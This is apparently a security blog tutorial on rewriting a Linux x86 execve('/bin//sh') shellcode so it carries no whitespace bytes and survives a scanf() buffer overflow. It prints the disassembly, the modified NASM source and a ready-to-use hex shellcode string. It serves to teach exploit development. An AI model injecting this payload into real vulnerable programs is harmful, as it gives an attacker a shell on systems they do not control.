Josh Stone, Blog

Josh’s projects and security nerdery

No Whitespace Shellcode

Here’s another installment in my series of posts about mystical things that turn out not to be so mystical. The information security industry is full of these, and today I’m posting about shellcode. Shellcode is definitely arcane, but it’s possible to enter this world – at least enough to get things done.

I was working on exploiting a vulnerability that relied on delivering a payload to overflow a buffer through a call to scanf(). What I noticed was that sometimes the entire shellcode would make it, and other times it would get truncated. After wrestling with it for awhile, I found this gem in the scanf() man page regarding the %s format string:

   Matches a  sequence  of  non-white-space  characters;  the  next
   pointer must be a pointer to character array that is long enough
   to hold the input sequence and the  terminating  null  character
   ('\0'), which is added automatically.  The input string stops at
   white space or at the  maximum  field  width,  whichever  occurs
   first.

Note the key phrase “non-white-space characters.” Yes, scanf() will stop reading when it gets to anything it considers whitespace. Its definition can be a little expansive too – not just the normal newline, tab, space, etc. Some interesting characters are whitespace as well (like the 0x0b, which is a vertical tab). To exploit the vulnerability I was working on, I needed shellcode without any whitespace in it.

I found a lot of nice shellcode examples on Shell Storm, but very few that didn’t have at least a 0x0c or 0x0b in them. So, not to be dissuaded from winning, I decided to try my hand at modifying one. Here’s the sample from Shell Storm, originally written by Jean Pascal Pereira:

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 50                    push   %eax
 8048063: 68 2f 2f 73 68        push   $0x68732f2f
 8048068: 68 2f 62 69 6e        push   $0x6e69622f
 804806d: 89 e3                 mov    %esp,%ebx
 804806f: 89 c1                 mov    %eax,%ecx
 8048071: 89 c2                 mov    %eax,%edx
 8048073: b0 0b                 mov    $0xb,%al
 8048075: cd 80                 int    $0x80
 8048077: 31 c0                 xor    %eax,%eax
 8048079: 40                    inc    %eax
 804807a: cd 80                 int    $0x80

Note in the hexadecimal encoded machine code that there appears a 0x0b character. This is the offending whitespace (it’s a vertical tab – why do those even EXIST?). First, we must understand where this comes from. It is the machine code representation of the instruction (sorry for switching syntaxes on you, but I prefer NASM):

mov al, 0xb    ; moves the value 0x0b (decimal 11) into register al

The reason this is necessary is because we want to call the Linux sys_execve() syscall. It happens to be number 11, and we’re not going to execute our shell without doing this. So we have to find another way to accomplish the same thing (and taking extra instructions is fine, since it’s a small shellcode). Here’s one idea:

mov al, 0xb0    ; moves the value 0xb0 into al, preparing for transformation
shr al, 4       ; shifts the 'b' into the least significant nibble (now equals 0x0b)

The assembly changes as shown below:

b0 0b   ->   b0 b0 c0 e8 04

I had to make a couple other modifications, since you either have to make some padding at the end of the shellcode above so that the push instructions don’t clobber the shellcode, or move esp before executing the shellcode (see below). Now, I throw that into my assembler with the following source:

section .text

global _start

_start:     
    xor  eax, eax     
    mov  al, 0x30     ; I added this so that there is room on the stack
    add  esp, eax     ; adding 48 bytes of extra space really helps
    xor  al, al
    push eax          ; This takes 4 bytes
    push 0x68732f2f   ; This takes another 4
    push 0x6e69622f   ; And finally, a total of 12 bytes of stack needed
    mov  ebx, esp
    mov  ecx, eax
    mov  al, 0xb0
    shr  al, 4
    int  0x80
    shr  al, 3
    int  0x80

And a quick compile:

Compile with NASM

The shell code works, and with just these small modifications, it will work well in my real-world case where I need to inject it into scanf(). Here’s the hex string for reference:

char *buf = "\x31\xc0\xb0\x30"
            "\x01\xc4\x30\xc0"
            "\x50\x68\x2f\x2f"
            "\x73\x68\x68\x2f"
            "\x62\x69\x6e\x89"
            "\xe3\x89\xc1\xb0"
            "\xb0\xc0\xe8\x04"
            "\xcd\x80\xc0\xe8"
            "\x03\xcd\x80";